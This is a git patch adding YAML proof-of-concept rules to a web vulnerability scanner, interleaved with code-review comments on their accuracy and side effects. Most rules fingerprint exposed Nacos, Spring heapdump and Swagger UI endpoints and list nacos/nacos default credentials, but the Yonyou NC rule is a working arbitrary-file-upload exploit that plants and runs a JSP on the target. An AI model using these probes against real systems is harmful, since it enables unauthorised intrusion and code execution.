From 14c9847f88f501c3d8af4dbbe93a817179c62dcf Mon Sep 17 00:00:00 2001 
From: shadow1ng
Date: Mon, 8 Feb 2021 15:13:56 +0800
Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0=E6=8C=87=E7=BA=B9=E8=AF=86?= =?UTF-8?q?=E5=88=AB=E5=8A=9F=E8=83=BD,=E5=8F=AF=E8=AF=86=E5=88=AB?= =?UTF-8?q?=E5=B0=9D=E8=AF=95CMS=E3=80=81=E6=A1=86=E6=9E=B6,=E5=A6=82?= =?UTF-8?q?=E8=87=B4=E8=BF=9COA=E3=80=81=E9=80=9A=E8=BE=BEOA=E7=AD=89?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
WebScan/pocs/alibaba-nacos-api-unauth.yml | 15 +++++++++++
WebScan/pocs/alibaba-nacos.yml | 13 ++++++++++
.../pocs/spring-actuator-heapdump-file.yml | 12 +++++++++
WebScan/pocs/spring-heapdump-file.yml | 12 +++++++++
WebScan/pocs/swagger-ui-unauth-No1.yml | 10 +++++++
WebScan/pocs/swagger-ui-unauth-No2.yml | 10 +++++++
WebScan/pocs/swagger-ui-unauth-No3.yml | 10 +++++++
WebScan/pocs/swagger-ui-unauth-No4.yml | 10 +++++++
WebScan/pocs/swagger-ui-unauth-No5.yml | 10 +++++++
WebScan/pocs/swagger-ui-unauth-No6.yml | 10 +++++++
WebScan/pocs/swagger-ui-unauth-No7.yml | 10 +++++++
WebScan/pocs/swagger-ui-unauth-No8.yml | 10 +++++++
.../yonyou-nc6.5-arbitrary-file-upload.yml | 26 +++++++++++++++++++
13 files changed, 158 insertions(+)
create mode 100644 WebScan/pocs/alibaba-nacos-api-unauth.yml
create mode 100644 WebScan/pocs/alibaba-nacos.yml
create mode 100644 WebScan/pocs/spring-actuator-heapdump-file.yml
create mode 100644 WebScan/pocs/spring-heapdump-file.yml
create mode 100644 WebScan/pocs/swagger-ui-unauth-No1.yml
create mode 100644 WebScan/pocs/swagger-ui-unauth-No2.yml
create mode 100644 WebScan/pocs/swagger-ui-unauth-No3.yml
create mode 100644 WebScan/pocs/swagger-ui-unauth-No4.yml
create mode 100644 WebScan/pocs/swagger-ui-unauth-No5.yml
create mode 100644 WebScan/pocs/swagger-ui-unauth-No6.yml
create mode 100644 WebScan/pocs/swagger-ui-unauth-No7.yml
create mode 100644 WebScan/pocs/swagger-ui-unauth-No8.yml
create mode 100644 WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml
diff --git a/WebScan/pocs/alibaba-nacos-api-unauth.yml b/WebScan/pocs/alibaba-nacos-api-unauth.yml
new file mode 100644
index 0000000..52512fb
--- /dev/null
+++ b/WebScan/pocs/alibaba-nacos-api-unauth.yml
@@ -0,0 +1,15 @@
+name: poc-yaml-alibaba-nacos-api-unauth
+rules:
+ - method: GET
+ path: /nacos/v1/auth/users?pageNo=1&pageSize=9
+ headers:
+ User-Agent: Nacos-Server
+ follow_redirects: true
+ expression: |
+ response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
+detail:
+ author: AgeloVito
+ info: alibaba-nacos-api-unauth
+ login: nacos/nacos
+ links:
+ - https://blog.csdn.net/caiqiiqi/article/details/112005424
diff --git a/WebScan/pocs/alibaba-nacos.yml b/WebScan/pocs/alibaba-nacos.yml
new file mode 100644
index 0000000..34a4407
--- /dev/null
+++ b/WebScan/pocs/alibaba-nacos.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-alibaba-nacos
+rules:
+ - method: GET
+ path: /nacos/
+ follow_redirects: true
+ expression: |
+ response.body.bcontains(bytes("Nacos"))
+detail:
+ author: AgeloVito
+ info: alibaba-nacos
+ login: nacos/nacos
+ links:
+ - https://blog.csdn.net/caiqiiqi/article/details/112005424
diff --git a/WebScan/pocs/spring-actuator-heapdump-file.yml b/WebScan/pocs/spring-actuator-heapdump-file.yml
new file mode 100644
index 0000000..db481ae
--- /dev/null
+++ b/WebScan/pocs/spring-actuator-heapdump-file.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-spring-actuator-heapdump-file
+rules:
+ - method: HEAD
+ path: /actuator/heapdump
+ follow_redirects: true
+ expression: |
+ response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+ author: AgeloVito
+ info: spring-actuator-heapdump-file
+ links:
+ - https://www.cnblogs.com/wyb628/p/8567610.html
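Review bot: The expression in alibaba-nacos-api-unauth.yml never checks `response.status`, unlike the heapdump rules added in the same commit, so any JSON body that happens to mention those four field names (an error document, an API description stub) is reported as a hit; prepending `response.status == 200 &&` to the existing expression would tighten it. In both this file and alibaba-nacos.yml the `login: nacos/nacos` entry under `detail` is a default-credential hint that neither rule verifies — the first only tests whether the user-list API answers without credentials, the second only looks for the string "Nacos" in the body — so a reader of the scan output may take it as a confirmed finding; label it as unverified, e.g. `login: nacos/nacos (default, not tested by this rule)`, or move it to documentation. The fingerprint in alibaba-nacos.yml is also weak on its own: `bcontains(bytes("Nacos"))` anywhere in the page with no status check matches any page that merely mentions the product, so at minimum it should require `response.status == 200`.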
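Review bot: Neither heapdump rule documents that the probe is not side-effect-free: the Spring heapdump endpoint produces a full JVM heap dump when it is hit, and Spring MVC normally services a HEAD request by running the GET handler and discarding the body, so even this HEAD check would presumably make the target write a heap dump to disk and spend CPU and memory doing so (worth confirming against the Spring Boot version in use). A one-line comment under `path:` such as `# HEAD avoids downloading the dump but still triggers its generation on the target` would let operators weigh that before enabling the rule. The same note applies to spring-heapdump-file.yml in this commit, which differs only in path.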
diff --git a/WebScan/pocs/spring-heapdump-file.yml b/WebScan/pocs/spring-heapdump-file.yml
new file mode 100644
index 0000000..148930d
--- /dev/null
+++ b/WebScan/pocs/spring-heapdump-file.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-spring-heapdump-file
+rules:
+ - method: HEAD
+ path: /heapdump
+ follow_redirects: true
+ expression: |
+ response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+ author: AgeloVito
+ info: spring-heapdump-file
+ links:
+ - https://www.cnblogs.com/wyb628/p/8567610.html
diff --git a/WebScan/pocs/swagger-ui-unauth-No1.yml b/WebScan/pocs/swagger-ui-unauth-No1.yml
new file mode 100644
index 0000000..591293f
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No1.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+ - method: GET
+ path: /swagger-ui.html
+ expression: |
+ response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+ author: AgeloVito
+ links:
+ - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No2.yml b/WebScan/pocs/swagger-ui-unauth-No2.yml
new file mode 100644
index 0000000..f93e8f9
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No2.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+ - method: GET
+ path: /api/swagger-ui.html
+ expression: |
+ response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+ author: AgeloVito
+ links:
+ - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No3.yml b/WebScan/pocs/swagger-ui-unauth-No3.yml
new file mode 100644
index 0000000..da56fc4
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No3.yml
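Review bot: All eight swagger-ui-unauth files carry `name: poc-yaml-druid-monitor-unauth`, apparently copy-pasted from a Druid monitor POC, so a hit on any of them is reported under the wrong name and the eight cannot be told apart in the scan output. Use `name: poc-yaml-swagger-ui-unauth-No1` here (and `-No2` … `-No8` in swagger-ui-unauth-No2.yml through No8.yml), and add an `info:` entry under `detail` as the nacos and heapdump rules in this commit do. Eight near-identical files also mean any future tweak to the expression has to be made eight times; if the rule format lets one file probe several paths, consolidating them would be cleaner, but that depends on how the engine combines `rules`, which is not visible here.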
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+ - method: GET
+ path: /service/swagger-ui.html
+ expression: |
+ response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+ author: AgeloVito
+ links:
+ - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No4.yml b/WebScan/pocs/swagger-ui-unauth-No4.yml
new file mode 100644
index 0000000..296ea00
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No4.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+ - method: GET
+ path: /web/swagger-ui.html
+ expression: |
+ response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+ author: AgeloVito
+ links:
+ - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No5.yml b/WebScan/pocs/swagger-ui-unauth-No5.yml
new file mode 100644
index 0000000..9b58279
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No5.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+ - method: GET
+ path: /swagger/swagger-ui.html
+ expression: |
+ response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+ author: AgeloVito
+ links:
+ - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No6.yml b/WebScan/pocs/swagger-ui-unauth-No6.yml
new file mode 100644
index 0000000..52d330b
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No6.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+ - method: GET
+ path: /actuator/swagger-ui.html
+ expression: |
+ response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+ author: AgeloVito
+ links:
+ - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No7.yml b/WebScan/pocs/swagger-ui-unauth-No7.yml
new file mode 100644
index 0000000..ebaebf4
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No7.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+ - method: GET
+ path: /libs/swagger-ui.html
+ expression: |
+ response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+ author: AgeloVito
+ links:
+ - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No8.yml b/WebScan/pocs/swagger-ui-unauth-No8.yml
new file mode 100644
index 0000000..323451b
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No8.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+ - method: GET
+ path: /template/swagger-ui.html
+ expression: |
+ response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+ author: AgeloVito
+ links:
+ - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml
new file mode 100644
index 0000000..8e6b75e
--- /dev/null
+++ b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml
@@ -0,0 +1,26 @@
+name: poc-yaml-yonyou-nc-arbitrary-file-upload
+set:
+ r1: randomInt(10000, 20000)
+ r2: randomInt(1000000000, 2000000000)
+ r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t"
+ r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx"
+rules:
+ - method: POST
+ path: /servlet/FileReceiveServlet
+ headers:
+ Content-Type: multipart/form-data;
+ body: >-
+ {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+ expression: |
+ response.status == 200
+ - method: GET
+ path: '/{{r1}}.jsp'
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ expression: |
+ response.status == 200 && response.body.bcontains(bytes(string(r2)))
+detail:
+ author: pa55w0rd(www.pa55w0rd.online/)
+ Affected Version: "YONYOU NC > 6.5"
+ links:
+ - https://blog.csdn.net/weixin_44578334/article/details/110917053
\ No newline at end of file
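Review bot: The second rule is the only thing that removes the JSP the first rule uploads, and (if rules are evaluated in sequence as the layout suggests) it is only reached when the POST returned 200, so whenever the GET to `/{{r1}}.jsp` fails — a different context path or web root, a proxy in between, a non-200 answer — the uploaded file stays on the target under a random name the operator is never told. A check that writes and executes a file on the target should at least surface that path in its result, and a comment above `set:` stating that this POC executes code on the target and relies on the payload's own `.delete()` for cleanup would make the side effect visible to whoever enables it. Separately, `detail` uses an `Affected Version` key containing a space and has no `info` key, unlike every other file in this commit; `info: yonyou-nc6.5-arbitrary-file-upload` plus a key such as `affected_version` would keep results uniform. The file also lacks a trailing newline.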